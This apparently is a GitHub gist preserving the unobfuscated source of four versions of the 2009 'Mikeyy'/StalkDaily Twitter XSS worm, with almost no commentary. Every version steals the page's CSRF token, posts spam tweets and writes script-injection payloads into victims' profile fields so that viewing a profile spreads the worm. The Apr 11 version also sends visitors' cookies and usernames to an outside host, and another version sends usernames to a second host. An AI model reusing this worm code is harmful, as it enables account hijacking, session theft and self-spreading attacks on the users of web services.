gist: 94145 - unobfuscated version of 94120; apparently accidently (and briefly) posted at http://content.ireel.com/xssjs.js at Sun Apr 12 14:42 EDT 2009; added Apr 13's #mikeyy v4 and v5 from @binnyva- GitHub


  
      #mikeyy v4 per http://twitter.com/binnyva/status/1508411802 #
    
    
        embed
        
      
      raw
    
  
            1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

          
              function XHConn() {
    var xmlhttp, bComplete = false;
    try {
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e) {
        try {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        catch (e) {
            try {
                xmlhttp = new XMLHttpRequest();
            }
            catch (e) {
                xmlhttp = false;
            }
        }
    }
    if (!xmlhttp) {
        return null;
    }
    this.connect = function (sURL, sMethod, sVars, fnDone) {
        if (!xmlhttp) {
            return false;
        }
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET") {
                xmlhttp.open(sMethod, sURL + "?" + sVars, true);
                sVars = "";
            } else {
                xmlhttp.open(sMethod, sURL, true);
                xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
                xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            }
            xmlhttp.onreadystatechange = function () {
                if (xmlhttp.readyState == 4 && !bComplete) {
                    bComplete = true;
                    if (fnDone != null) {
                        fnDone(xmlhttp);
                    }
                }
            };
            xmlhttp.send(sVars);
        }
        catch (z) {
            return false;
        }
        return true;
    };
    return this;
}
 
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  
  var randomUpdate=new Array();
  randomUpdate[0]="Twitter, freaking fix this already. >:[ - Mikeyy";
  randomUpdate[1]="Twitter, your community is going to be mad at you... - Mikeyy";
  randomUpdate[2]="This worm is getting out of hand Twitter. - Mikeyy";
  randomUpdate[3]="RT!! 4th gen #Mikeyy worm on the loose! Click here to protect yourself: http://tinyurl.com/cojc6s";
  randomUpdate[4]="This is all Twitters fault! Don't blame Mikeyy!!";
  randomUpdate[5]="ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT: http://bit.ly/4ywBID";
  randomUpdate[6]="How TO remove new Mikeyy worm! RT!!  http://bit.ly/yCL1s";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  var updateEncode = urlencode(genRand);
  
  var randomXSS=new Array();
  randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>';
  var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
  
  var xss = urlencode(genXSS);
  
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
  var ajaxConn2 = new XHConn();
  ajaxConn2.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&commit=save changes");
  var ajaxConn3 = new XHConn();
  ajaxConn3.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected]=0&commit=Save");
  var ajaxConn4 = new XHConn();
  ajaxConn4.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[name]="+xss+"&commit=save changes");
  var ajaxConn5 = new XHConn();
  ajaxConn5.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
}
 
setTimeout("wait()",3550);
            
          
      #mikeyy v5 per http://twitter.com/binnyva/status/1508414919 #
    
    
        embed
        
      
      raw
    
  
            1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

          
              function XHConn() {
    var xmlhttp, bComplete = false;
    try {
        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e) {
        try {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        catch (e) {
            try {
                xmlhttp = new XMLHttpRequest();
            }
            catch (e) {
                xmlhttp = false;
            }
        }
    }
    if (!xmlhttp) {
        return null;
    }
    this.connect = function (sURL, sMethod, sVars, fnDone) {
        if (!xmlhttp) {
            return false;
        }
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET") {
                xmlhttp.open(sMethod, sURL + "?" + sVars, true);
                sVars = "";
            } else {
                xmlhttp.open(sMethod, sURL, true);
                xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
                xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            }
            xmlhttp.onreadystatechange = function () {
                if (xmlhttp.readyState == 4 && !bComplete) {
                    bComplete = true;
                    if (fnDone != null) {
                        fnDone(xmlhttp);
                    }
                }
            };
            xmlhttp.send(sVars);
        }
        catch (z) {
            return false;
        }
        return true;
    };
    return this;
}
 
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
  var username = userreg.exec(content);
  username = username[1];
 
  document.write("<img src='http://www.stalkdaily.com/x.php?username=" + username + "'>");
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  
  var randomUpdate=new Array();
  randomUpdate[0]="Twitter, hire Mikeyy! (718) 312-8131 :)";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  var updateEncode = urlencode(genRand);
  
  var randomXSS=new Array();
  randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>';
  var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
  
  var xss = urlencode(genXSS);
  
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
  var ajaxConn2 = new XHConn();
  ajaxConn2.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&commit=save changes");
  var ajaxConn3 = new XHConn();
  ajaxConn3.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected]=0&commit=Save");
  var ajaxConn4 = new XHConn();
  ajaxConn4.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=colors&profile_theme=1&user[profile_background_color]="+urlencode('## Mikeyy')+"&user[name]="+xss+"&commit=save changes");
  var ajaxConn5 = new XHConn();
  ajaxConn5.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Save");
}
 
setTimeout("wait()",3550); 
 
            
      unobfuscated js from Apr 12 attack; cf. @supyo http://twitter.com/supyo/status/1504316412 #
    
    
        embed
        
      
      raw
    
  
            1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124

          
              function XHConn() {
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  
  /*
  var randomUpdate=new Array();
  randomUpdate[0]="Twitter should really fix this... Mikeyy";
  randomUpdate[1]="I am done... Mikeyy";
  randomUpdate[2]="Mikeyy is done..";
  randomUpdate[3]="Twitter please fix this, regards Mikeyy";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  var updateEncode = urlencode(genRand);
  */
  
  var randomXSS=new Array();
  randomXSS[0]='mikeyy:)           "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script>                       <a ';
  randomXSS[1]='mikeyy:)            "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script>                       <a ';
  randomXSS[2]='mikeyy:)            "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script>                       <a ';
  
  var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
  var xss = urlencode(genXSS); 
 
  /*
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
  */
  var alert = urlencode("You got me. :)");
  
  var ajaxConn = new XHConn();
  ajaxConn.connect("/direct_messages/create", "POST", "authenticity_token="+authtoken+"&text="+alert+"&twttr=true&user[id]=30685046");
  
  var ajaxConn3 = new XHConn();
  ajaxConn3.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="+xss+"&user[location]=Womp+++++++++++++++++++++++++++++++++++++++++!Womp+++++++++++++++++++++++++++++++++++++++++!&tab=home&update=update");
  
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]="+xss+"&commit=save+changes");
 
  var ajaxConn4 = new XHConn();
  ajaxConn4.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="+xss+"&user[location]=Womp+++++++++++++++++++++++++++++++++++++++++!Womp+++++++++++++++++++++++++++++++++++++++++!&tab=home&update=update");
    
  var ajaxConn5 = new XHConn();
  ajaxConn5.connect("/account/profile_settings", "POST", "authenticity_token="+authtoken+"&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]="+xss+"&commit=save+changes");
  
  var ajaxConn6 = new XHConn();
  ajaxConn6.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="+xss+"&tab=home&update=update");
 
}
setTimeout("wait()",3500);
            
          
      x.js from Sat Apr 11 21:05 EDT 2009 #
    
    
        embed
        
      
      raw
    
  
            1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110

          
              function XHConn()
{
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
function urlencode( str ) {           
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"]   = '%27';
    histogram['(']   = '%28';
    histogram[')']   = '%29';
    histogram['*']   = '%2A';
    histogram['~']   = '%7E';
    histogram['!']   = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
 
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
function wait()
{
	var content = document.documentElement.innerHTML;
 
	authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
	var authtoken = authreg.exec(content);
	authtoken = authtoken[1];
	//alert(authtoken);
 
	var randomUpdate=new Array();
	randomUpdate[0]="Twitter has been hacked !!! http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
	randomUpdate[1]="Twitter worm, read here http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
	randomUpdate[2]="StalkDaily worm on Twitter, more info http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
	randomUpdate[3]="http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED HOWTO: Remove StalkDaily.com Auto-Tweets From Your Infected Twitter Profile | Twittercism";
	randomUpdate[4]="#Stalkdaily virus runs riots on twitter. Learn how to remove it http://www.stalkdaily.com/member/?TWITTERHACKED&TWITTERHACKED&TWITTERHACKED&TWITTERHACKED";
 
	var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
 
	updateEncode = urlencode(genRand);
 
	var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
 
	var ajaxConn = new XHConn();
	ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
	var ajaxConn1 = new XHConn();
	ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Description:	unobfuscated version of 94120; apparently accidently (and briefly) posted at http://content.ireel.com/xssjs.js at Sun Apr 12 14:42 EDT 2009; added Apr 13's #mikeyy v4 and v5 from @binnyva
Public Clone URL:	git://gist.github.com/94145.git Give this clone URL to anyone. `git clone git://gist.github.com/94145.git gist-94145`
Embed All Files:	show embed